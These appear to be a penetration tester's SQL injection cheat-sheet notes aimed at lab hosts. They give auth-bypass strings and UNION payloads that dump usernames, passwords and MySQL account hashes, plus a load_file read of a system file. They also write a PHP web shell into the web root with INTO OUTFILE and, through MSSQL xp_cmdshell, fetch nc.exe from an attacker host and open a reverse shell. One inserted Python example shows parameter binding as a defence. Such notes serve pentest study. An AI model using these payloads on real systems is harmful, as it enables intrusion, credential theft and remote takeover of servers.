sqli
Detection
add ' to the parameter and look for a database error
Auth Bypass
admin' or 1=1 LIMIT 1;#
' or 1=1-- -
' or '1'='1
' or 1=1 --
Column Enum
http://10.11.0.22/debug.php?id=1 order by 1--
This gives an error as soon as the number exceeds the column count, so increase the number until it errors to find the correct number of columns.
Union to get all data
Suppose there are 3 columns; the following checks which of them are displayed in the output:
http://10.11.0.22/debug.php?id=1 union all select 1, 2, 3 --
Extract data through union
Suppose columns 2 and 3 are displayed. This returns the database user and the MySQL version:
http://10.11.0.22/debug.php?id=1 union all select 1, user(), @@version
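Added example, not from these notes: the debug.php?id= lookup rebuilt in Python on an in-memory sqlite3 database (an assumed stand-in for MySQL, so user() and @@version are unavailable), showing why the order-by probe and the union payload above work against string concatenation and do nothing against a bound parameter.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the debug.php?id= backend (sqlite3, not MySQL)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products(id INTEGER, name TEXT, price INTEGER);
        INSERT INTO products VALUES (1, 'widget', 10), (2, 'gadget', 20);
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 's3cret');
    """)
    return conn


def lookup_vulnerable(conn, id_param):
    """The pattern behind the notes: the parameter is pasted into the SQL text."""
    sql = "SELECT id, name, price FROM products WHERE id = " + id_param
    return conn.execute(sql).fetchall()


def lookup_safe(conn, id_param):
    """Hardened form: the parameter is bound as a value and cannot alter the query shape."""
    sql = "SELECT id, name, price FROM products WHERE id = ?"
    return conn.execute(sql, (id_param,)).fetchall()


def run(fn, conn, id_param):
    """Return ("rows", rows) or ("error", message) so the effect of each input is visible."""
    try:
        return ("rows", fn(conn, id_param))
    except sqlite3.Error as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    conn = make_db()
    union = "1 union all select 1, username, password from users"
    for payload in ("1", "1 order by 3--", "1 order by 4--", union):
        # Concatenation: 'order by 4' errors (3 columns), the union appends the users row.
        print("vulnerable", repr(payload), run(lookup_vulnerable, conn, payload))
        # Binding: every payload is just a value compared against id; nothing leaks.
        print("safe      ", repr(payload), run(lookup_safe, conn, payload))
```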
Get database name
http://10.11.0.22/debug.php?id=1 union all select 1, schema_name, 3 from information_schema.schemata
Get table names
http://10.11.0.22/debug.php?id=1 union all select 1, table_name, 3 from information_schema.tables
This returns only one table. To get all of them in one row, use group_concat:
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='mysql'
Get column names from the users table
http://10.11.0.22/debug.php?id=1 union all select 1, 2, column_name from information_schema.columns where table_name='users'
Suppose there are two columns, username and password:
http://10.11.0.22/debug.php?id=1 union all select 1, username, password from users
The same works against the MySQL account table (the table is mysql.user, not mysql.users, and the hash column is authentication_string on MySQL 5.7+):
http://10.11.0.22/debug.php?id=1 union all select 1, user, password from mysql.user
Code execution
Depending on the OS (and whether the database account has the FILE privilege), the following reads a local file:
http://10.11.0.22/debug.php?id=1 union all select 1, 2, load_file('C:/Windows/System32/drivers/etc/hosts')
INTO OUTFILE is used to write a malicious file into the web root (also needs the FILE privilege and a writable path not blocked by secure_file_priv):
http://10.11.0.22/debug.php?id=1 union all select 1, 2, "<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE 'c:/xampp/htdocs/backdoor.php'
It may return an error, but the file is still created. Visit /backdoor.php?cmd=dir to check.
Reverse shell
- Database enumeration is not useful in some cases, so get a reverse shell instead (MSSQL)
- Enable xp_cmdshell
- ' EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
- Upload nc.exe from the attacking Linux box to the target
- ' EXEC xp_cmdshell 'powershell -c "certutil -urlcache -f http://192.168.119.143/nc.exe C:\Windows\Tasks\nc.exe"'--
- Reverse shell (start the listener first, then run the second command through xp_cmdshell)
- nc -nvlp 4444
- ' EXEC xp_cmdshell 'powershell -c "C:\Windows\Tasks\nc.exe 192.168.119.143 4444 -e cmd.exe"' --
- For Oracle injection see
https://www.securityidiots.com/Web-Pentest/SQL-Injection/Union-based-Oracle-Injection.html